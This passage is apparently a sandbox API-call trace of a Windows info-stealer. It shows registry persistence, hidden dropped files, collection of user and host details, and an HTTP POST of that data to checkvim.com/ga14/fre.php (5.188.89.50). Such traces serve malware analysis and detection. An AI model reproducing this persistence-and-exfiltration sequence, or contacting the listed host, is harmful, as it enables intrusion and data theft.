dwFlags=0x0, lpMem=0x87f010 | out: hHeap=0x840000) returned 1 [0188.087] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0188.087] AllocateAndInitializeSid (in: pIdentifierAuthority=0x19f9a4, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x19f9ac | out: pSid=0x19f9ac*=0x8789f8*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0188.088] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0188.088] CheckTokenMembership (in: TokenHandle=0x0, SidToCheck=0x8789f8*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x19f9b0 | out: IsMember=0x19f9b0) returned 1 [0188.089] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0188.090] GetProcessHeap () returned 0x840000 [0188.090] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x60) returned 0x873ac0 [0188.090] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0188.091] CryptAcquireContextW (in: phProv=0x19f93c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f93c*=0x0) returned 1 [0188.096] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0188.096] CryptAcquireContextW (in: phProv=0x19f93c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f93c*=0x87ed68) returned 1 [0188.106] GetProcessHeap () returned 0x840000 [0188.106] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8706c8 [0188.107] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0188.108] CryptImportKey (in: hProv=0x87ed68, pbData=0x8706c8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f940 | out: phKey=0x19f940*=0x87e8b0) returned 1 [0188.108] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0188.109] CryptSetKeyParam (hKey=0x87e8b0, dwParam=0x4, pbData=0x19f938*=0x1, dwFlags=0x0) returned 1 [0188.110] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0188.110] CryptSetKeyParam (hKey=0x87e8b0, dwParam=0x1, pbData=0x418844, dwFlags=0x0) returned 1 [0188.110] GetProcessHeap () returned 0x840000 [0188.110] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8706c8 | out: hHeap=0x840000) returned 1 [0188.111] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0188.112] CryptDecrypt (in: hKey=0x87e8b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x873ac0, pdwDataLen=0x19f990 | out: pbData=0x873ac0, pdwDataLen=0x19f990) returned 1 [0188.113] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0188.113] CryptDestroyKey (hKey=0x87e8b0) returned 1 [0188.114] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0188.114] CryptReleaseContext (hProv=0x87ed68, dwFlags=0x0) returned 1 [0188.115] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x873ac0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 28 [0188.115] GetProcessHeap () returned 0x840000 [0188.115] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x38) returned 0x87e7b0 [0188.116] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x873ac0, cbMultiByte=-1, lpWideCharStr=0x87e7b0, cchWideChar=28 | out: lpWideCharStr="������М�������ќ��И���Й��я��") returned 28 [0188.116] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0188.117] SHRegSetPathW (hKey=0x80000001, pcszSubKey="������М�������ќ��И���Й��я��", pcszValue="9EDDE9", pcszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.exe", dwFlags=0x0) returned 0x0 [0188.118] GetProcessHeap () returned 0x840000 [0188.118] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87e7b0 | out: hHeap=0x840000) returned 1 [0188.118] GetProcessHeap () returned 0x840000 [0188.118] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873ac0 | out: hHeap=0x840000) returned 1 [0188.118] GetProcessHeap () returned 0x840000 [0188.118] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x861118 | out: hHeap=0x840000) returned 1 [0188.119] SetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.exe", dwFileAttributes=0x2006) returned 1 [0188.121] SetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9", dwFileAttributes=0x2006) returned 1 [0188.121] GetProcessHeap () returned 0x840000 [0188.121] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0188.121] GetProcessHeap () returned 0x840000 [0188.121] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x860c98 | out: hHeap=0x840000) returned 1 [0188.121] GetProcessHeap () returned 0x840000 [0188.121] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87eb58 | out: hHeap=0x840000) returned 1 [0188.121] GetProcessHeap () returned 0x840000 [0188.121] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x2bc) returned 0x87eb58 [0188.121] GetProcessHeap () returned 0x840000 [0188.121] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xc) returned 0x8789b0 [0188.121] GetProcessHeap () returned 0x840000 [0188.121] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x11c) returned 0x87f010 [0188.122] RtlGetVersion (in: lpVersionInformation=0x87f010 | out: lpVersionInformation=0x87f010*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 0x0 [0188.122] GetProcessHeap () returned 0x840000 [0188.122] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f010 | out: hHeap=0x840000) returned 1 [0188.122] GetProcessHeap () returned 0x840000 [0188.123] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x87f010 [0188.123] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0188.124] GetUserNameW (in: lpBuffer=0x87f010, pcbBuffer=0x19fb78 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x19fb78) returned 1 [0188.124] GetProcessHeap () returned 0x840000 [0188.125] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f010 | out: hHeap=0x840000) returned 1 [0188.125] GetProcessHeap () returned 0x840000 [0188.125] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x87f010 [0188.125] GetComputerNameW (in: lpBuffer=0x87f010, nSize=0x19fb78 | out: lpBuffer="XC64ZB", nSize=0x19fb78) returned 1 [0188.125] GetProcessHeap () returned 0x840000 [0188.125] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f010 | out: hHeap=0x840000) returned 1 [0188.125] GetCurrentThread () returned 0xfffffffe [0188.126] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0188.127] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x8, OpenAsSelf=1, TokenHandle=0x19fb78 | out: TokenHandle=0x19fb78*=0x0) returned 0 [0188.127] GetLastError () returned 0x3f0 [0188.127] GetCurrentProcess () returned 0xffffffff [0188.128] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0188.129] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x19fb78 | out: TokenHandle=0x19fb78*=0x270) returned 1 [0188.129] GetProcessHeap () returned 0x840000 [0188.129] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x87f010 [0188.129] GetProcessHeap () returned 0x840000 [0188.129] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x87f220 [0188.130] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0188.135] GetTokenInformation (in: TokenHandle=0x270, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x19fb74 | out: TokenInformation=0x0, ReturnLength=0x19fb74) returned 0 [0188.135] GetProcessHeap () returned 0x840000 [0188.135] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870668 [0188.136] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0188.137] GetTokenInformation (in: TokenHandle=0x270, TokenInformationClass=0x1, TokenInformation=0x870668, TokenInformationLength=0x24, ReturnLength=0x19fb74 | out: TokenInformation=0x870668, ReturnLength=0x19fb74) returned 1 [0188.138] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0188.145] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x870670*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)), Name=0x87f010, cchName=0x19fb64, ReferencedDomainName=0x87f220, cchReferencedDomainName=0x19fb68, peUse=0x19fb60 | out: Name="RDhJ0CNFevzX", cchName=0x19fb64, ReferencedDomainName="XC64ZB", cchReferencedDomainName=0x19fb68, peUse=0x19fb60) returned 1 [0188.147] GetProcessHeap () returned 0x840000 [0188.147] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f44) returned 0x8805c8 [0188.148] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0188.149] wvsprintfW (in: param_1=0x8805c8, param_2="%s", arglist=0x19fb50 | out: param_1="XC64ZB") returned 6 [0188.149] GetProcessHeap () returned 0x840000 [0188.149] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878b60 [0188.149] GetProcessHeap () returned 0x840000 [0188.149] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0188.149] GetProcessHeap () returned 0x840000 [0188.149] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870668 | out: hHeap=0x840000) returned 1 [0188.149] CloseHandle (hObject=0x270) returned 1 [0188.150] GetProcessHeap () returned 0x840000 [0188.150] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f220 | out: hHeap=0x840000) returned 1 [0188.150] GetProcessHeap () returned 0x840000 [0188.150] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f010 | out: hHeap=0x840000) returned 1 [0188.150] GetProcessHeap () returned 0x840000 [0188.150] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878b60 | out: hHeap=0x840000) returned 1 [0188.151] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0188.151] GetDesktopWindow () returned 0x10010 [0188.152] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0188.153] GetWindowRect (in: hWnd=0x10010, lpRect=0x19fb70 | out: lpRect=0x19fb70) returned 1 [0188.153] GetProcessHeap () returned 0x840000 [0188.153] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x8) returned 0x871b08 [0188.153] GetProcessHeap () returned 0x840000 [0188.153] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b08 | out: hHeap=0x840000) returned 1 [0188.154] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0188.154] GetUserNameW (in: lpBuffer=0x19f970, pcbBuffer=0x19fb78 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x19fb78) returned 1 [0188.156] LoadLibraryW (lpLibFileName="NETAPI32") returned 0x769b0000 [0188.157] GetProcAddress (hModule=0x769b0000, lpProcName="NetUserGetInfo") returned 0x658b33a0 [0188.157] NetUserGetInfo (in: servername=0x0, username="RDhJ0CNFevzX", level=0x1, bufptr=0x19fb7c | out: bufptr=0x87fe60*(usri1_name="RDhJ0CNFevzX", usri1_password=0x0, usri1_password_age=0x124bb6, usri1_priv=0x2, usri1_home_dir="", usri1_comment="", usri1_flags=0x10201, usri1_script_path="")) returned 0x0 [0188.164] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0188.164] AllocateAndInitializeSid (in: pIdentifierAuthority=0x19fb68, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x19fb70 | out: pSid=0x19fb70*=0x878ae8*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0188.165] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0188.165] CheckTokenMembership (in: TokenHandle=0x0, SidToCheck=0x878ae8*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x19fb74 | out: IsMember=0x19fb74) returned 1 [0188.166] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0188.167] GetNativeSystemInfo (in: lpSystemInfo=0x19fb4c | out: lpSystemInfo=0x19fb4c*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5507)) [0188.167] GetProcessHeap () returned 0x840000 [0188.167] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f7a0 [0188.168] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0188.182] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0188.189] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0188.189] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x873a58) returned 1 [0188.198] GetProcessHeap () returned 0x840000 [0188.198] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870818 [0188.199] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0188.199] CryptImportKey (in: hProv=0x873a58, pbData=0x870818, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e7b0) returned 1 [0188.200] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0188.201] CryptSetKeyParam (hKey=0x87e7b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0188.202] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0188.202] CryptSetKeyParam (hKey=0x87e7b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0188.202] GetProcessHeap () returned 0x840000 [0188.202] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870818 | out: hHeap=0x840000) returned 1 [0188.203] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0188.204] CryptDecrypt (in: hKey=0x87e7b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f7a0, pdwDataLen=0x19f9a4 | out: pbData=0x87f7a0, pdwDataLen=0x19f9a4) returned 1 [0188.205] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0188.205] CryptDestroyKey (hKey=0x87e7b0) returned 1 [0188.206] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0188.208] CryptReleaseContext (hProv=0x873a58, dwFlags=0x0) returned 1 [0188.208] GetProcessHeap () returned 0x840000 [0188.208] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x87f010 [0188.208] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0188.209] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0188.209] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0188.210] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0188.211] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0188.211] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0188.211] GetProcessHeap () returned 0x840000 [0188.211] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871600 [0188.211] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871178*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8789c8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0188.215] GetProcessHeap () returned 0x840000 [0188.215] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b08 [0188.215] socket (af=2, type=1, protocol=6) returned 0x284 [0188.215] connect (s=0x284, name=0x8789c8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0188.288] FreeAddrInfoW (pAddrInfo=0x871178*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8789c8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0188.288] GetProcessHeap () returned 0x840000 [0188.288] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x87f230 [0188.289] GetProcessHeap () returned 0x840000 [0188.289] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8805c8 [0188.289] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0188.290] wvsprintfA (in: param_1=0x8805c8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0188.290] GetProcessHeap () returned 0x840000 [0188.290] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x87f2b8 [0188.290] GetProcessHeap () returned 0x840000 [0188.290] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0188.290] GetProcessHeap () returned 0x840000 [0188.290] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f5f0 [0188.290] GetProcessHeap () returned 0x840000 [0188.290] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8805c8 [0188.291] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0188.292] wvsprintfA (in: param_1=0x8805c8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0188.292] GetProcessHeap () returned 0x840000 [0188.292] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x87f370 [0188.292] GetProcessHeap () returned 0x840000 [0188.292] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0188.292] send (s=0x284, buf=0x87f370*, len=237, flags=0) returned 237 [0188.293] send (s=0x284, buf=0x87eb58*, len=159, flags=0) returned 159 [0188.293] GetProcessHeap () returned 0x840000 [0188.293] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x86f220 [0188.293] recv (in: s=0x284, buf=0x86f220, len=4048, flags=0 | out: buf=0x86f220*) returned 237 [0188.665] GetProcessHeap () returned 0x840000 [0188.665] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f370 | out: hHeap=0x840000) returned 1 [0188.665] GetProcessHeap () returned 0x840000 [0188.665] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f5f0 | out: hHeap=0x840000) returned 1 [0188.665] GetProcessHeap () returned 0x840000 [0188.665] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f2b8 | out: hHeap=0x840000) returned 1 [0188.665] GetProcessHeap () returned 0x840000 [0188.665] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f230 | out: hHeap=0x840000) returned 1 [0188.665] closesocket (s=0x284) returned 0 [0188.666] GetProcessHeap () returned 0x840000 [0188.666] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b08 | out: hHeap=0x840000) returned 1 [0188.666] GetProcessHeap () returned 0x840000 [0188.666] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f010 | out: hHeap=0x840000) returned 1 [0188.666] GetProcessHeap () returned 0x840000 [0188.666] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f7a0 | out: hHeap=0x840000) returned 1 [0188.666] GetProcessHeap () returned 0x840000 [0188.666] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871600 | out: hHeap=0x840000) returned 1 [0188.666] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x86f220, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0xd4c) returned 0x284 [0188.668] Sleep (dwMilliseconds=0xea60) [0198.711] GetProcessHeap () returned 0x840000 [0198.711] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f5f0 [0199.041] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0199.049] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0199.142] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0199.143] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x873a58) returned 1 [0199.362] GetProcessHeap () returned 0x840000 [0199.362] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0199.363] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0199.364] CryptImportKey (in: hProv=0x873a58, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e2f0) returned 1 [0199.390] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0199.391] CryptSetKeyParam (hKey=0x87e2f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0199.391] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0199.392] CryptSetKeyParam (hKey=0x87e2f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0199.392] GetProcessHeap () returned 0x840000 [0199.392] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0199.393] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0199.393] CryptDecrypt (in: hKey=0x87e2f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f5f0, pdwDataLen=0x19f9a4 | out: pbData=0x87f5f0, pdwDataLen=0x19f9a4) returned 1 [0199.403] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0199.404] CryptDestroyKey (hKey=0x87e2f0) returned 1 [0199.405] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0199.405] CryptReleaseContext (hProv=0x873a58, dwFlags=0x0) returned 1 [0199.405] GetProcessHeap () returned 0x840000 [0199.405] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x87f010 [0199.406] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0199.406] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0199.407] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0199.407] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0199.408] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0199.408] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0199.409] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0199.409] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0199.409] GetProcessHeap () returned 0x840000 [0199.409] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871268 [0199.416] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0199.490] GetProcessHeap () returned 0x840000 [0199.490] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871268 | out: hHeap=0x840000) returned 1 [0199.490] GetProcessHeap () returned 0x840000 [0199.490] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f010 | out: hHeap=0x840000) returned 1 [0199.490] GetProcessHeap () returned 0x840000 [0199.490] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f5f0 | out: hHeap=0x840000) returned 1 [0199.490] GetProcessHeap () returned 0x840000 [0199.490] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f8c0 [0199.491] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0199.492] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0199.499] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0199.500] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f3e0) returned 1 [0199.508] GetProcessHeap () returned 0x840000 [0199.508] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870818 [0199.509] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0199.510] CryptImportKey (in: hProv=0x86f3e0, 